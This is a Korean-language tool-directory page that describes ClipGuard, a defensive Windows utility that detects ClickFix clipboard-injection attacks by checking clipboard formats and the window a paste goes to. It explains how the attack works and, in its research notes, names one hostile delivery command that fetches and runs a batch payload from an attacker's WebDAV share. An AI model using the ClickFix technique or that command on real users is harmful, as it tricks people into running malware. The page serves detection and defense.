Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
ClipGuard — 클립보드 서식과 실행 표면 검사를 사용하여 클릭픽스 공격을 중지하도록 설계된 경량 도구 | Kitploit
도구/GitHubGitHub/certainlyp/clipguard
Defensive ToolsPhishing ToolsSocial EngineeringPapers & ResearchLearning & EducationAnti-Bot
GitHubcertainlyp/clipguard

ClipGuard

클립보드 서식과 실행 표면 검사를 사용하여 클릭픽스 공격을 중지하도록 설계된 경량 도구

저장소 보기
1285개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

ClipGuard

Windows에서 ClickFix 클립보드 인젝션 공격을 실시간으로 탐지합니다.

ClipGuard는 클립보드 활동을 모니터링하고 의심스러운 붙여넣기 작업이 실행되기 전에 가로채며, 특히 가짜 확인 페이지가 사용자를 속여 악성 명령을 붙여넣게 하는 ClickFix 기법을 대상으로 합니다.

문제

ClickFix 공격은 다음과 같이 작동합니다:

  1. 피해자가 가짜 CAPTCHA 또는 확인 메시지가 표시된 페이지에 접속합니다.
  2. JavaScript가 악성 명령(일반적으로 PowerShell)을 클립보드에 자동으로 복사합니다.
  3. 페이지는 사용자에게 Win+R을 누르고 붙여넣기(Ctrl+V)한 다음 Enter를 누르도록 안내합니다.
  4. 사용자는 자신도 모르게 페이로드를 직접 실행하여 기존 보안 제어를 우회합니다.

핵심 통찰: JavaScript가 navigator.clipboard.writeText()를 통해 클립보드에 쓸 때 클립보드에는 CF_UNICODETEXT만 포함됩니다. 반면, 사용자가 웹페이지에서 텍스트를 수동으로 선택하여 복사하면 브라우저는 CF_UNICODETEXT와 CF_HTML을 모두 클립보드에 넣습니다. ClipGuard는 이 형식 차이를 주요 탐지 신호 중 하나로 사용합니다.

작동 방식

ClipGuard는 시스템 트레이에서 실행되며 여러 탐지 메커니즘을 계층화합니다:

  1. 클립보드 출처 추적 — WM_CLIPBOARDUPDATE 메시지를 수신하고 모든 클립보드 변경에 대해 소스 프로세스, 클립보드 형식(CF_HTML 대 CF_UNICODETEXT), 내용 길이, 내용 미리보기를 기록합니다.

  2. 실행 표면 탐지 — 포그라운드 창이 명령 실행 표면(실행 대화상자(Win+R), cmd.exe, powershell.exe, pwsh.exe 또는 Windows Terminal)인지 식별합니다.

  3. 키보드 후크(Ctrl+V 가로채기) — 저수준 키보드 후크(WH_KEYBOARD_LL)가 Ctrl+V 키 입력을 가로챕니다. 브라우저에서 가져온 클립보드 내용으로 실행 표면에 붙여넣기가 시도되면 ClipGuard가 위협을 평가합니다.

  4. 형식 기반 판정 — 클립보드 내용이 브라우저에서 왔고 텍스트만 포함(CF_HTML 없음)하는 경우 의심스럽다고 플래그를 지정합니다. 이는 사용자가 직접 복사한 것이 아닌 JavaScript 클립보드 쓰기(HTML 표시기가 없음)일 가능성을 나타냅니다. 붙여넣기가 차단되고 사용자는 허용 또는 차단을 결정하기 전에 클립보드 내용이 포함된 경고를 보게 됩니다.

데모

image

탐지 로직

root@kitploit:~
Clipboard updated by browser?
  -- YES: User pastes (Ctrl+V) into execution surface?
       -- YES: Clipboard has CF_UNICODETEXT only (no CF_HTML)?
            -- YES: BLOCK — Suspected ClickFix (JS clipboard write)
            -- NO:  Strict Mode on?
                 -- YES: WARN — User copy, but going to exec surface
                 -- NO:  ALLOW

지원되는 실행 표면

  • 실행 대화상자(Win+R) — explorer.exe의 하위 창 클래스 #32770 + ComboBox 자식을 통해 탐지
  • cmd.exe — 프로세스 이름 일치
  • powershell.exe / pwsh.exe — 프로세스 이름 일치
  • Windows Terminal (wt.exe) — 프로세스 이름 일치

모니터링되는 브라우저

Edge, Chrome, Firefox, Brave, Opera, Vivaldi, Chromium, Arc

설치

사전 요구 사항:

  • Windows 10/11
  • .NET 8.0 런타임 (https://dotnet.microsoft.com/download/dotnet/8.0)
  • 관리자 권한으로 실행 (저수준 키보드 후크 필요)

소스에서 빌드:

root@kitploit:~
git clone https://github.com/CertainlyP/ClipGuard.git
cd ClipGuard
dotnet build -c Release

또는 Releases 페이지에서 미리 컴파일된 바이너리를 다운로드하세요.

사용법

  1. ClipGuard.exe를 관리자 권한으로 실행합니다.
  2. ClipGuard가 녹색 방패 아이콘으로 시스템 트레이에 나타납니다.
  3. 트레이 아이콘을 마우스 오른쪽 버튼으로 클릭하면 상태, 로그 열기, 엄격 모드, 종료 옵션이 표시됩니다.

의심스러운 붙여넣기가 감지되면 ClipGuard는 클립보드 내용 미리보기, 소스 프로세스 및 PID, 클립보드 형식 분석, 붙여넣기를 차단하거나 허용하는 옵션이 포함된 경고를 표시합니다.

로그는 %APPDATA%\ClipGuard\shield.log에 기록됩니다.

제한 사항

  • 키보드 후크를 위해 관리자 권한이 필요합니다.
  • 실행을 차단하지 않습니다. 붙여넣기를 가로채고 사용자에게 경고합니다.
  • 합법적인 사이트(예: GitHub 코드 블록)의 복사 버튼도 JS 클립보드 쓰기를 사용하므로 경고를 트리거합니다. 사용자가 터미널에 붙여넣기 전에 확인해야 하므로 의도된 동작입니다.
  • 현재 Win+R 후 수동 입력(붙여넣기가 아닌 직접 입력)은 모니터링하지 않습니다.

연구

이 도구는 ClickFix 공격 메커니즘에 대한 독창적인 연구를 기반으로 합니다:

  • 클립보드 형식 메타데이터를 탐지 신호로 사용 — CF_HTML 존재 여부는 사용자 복사와 JavaScript navigator.clipboard.writeText() 호출을 구분합니다.
  • WebDAV 기반 ClickFix 전달 체인 — pushd \attacker\share + type payload.bat | cmd 변형
  • 실행 표면 지문 추적 — 창 클래스 및 자식 컨트롤 열거를 통해 프로그래밍 방식으로 실행 대화상자 식별

라이선스

MIT

도구 다운로드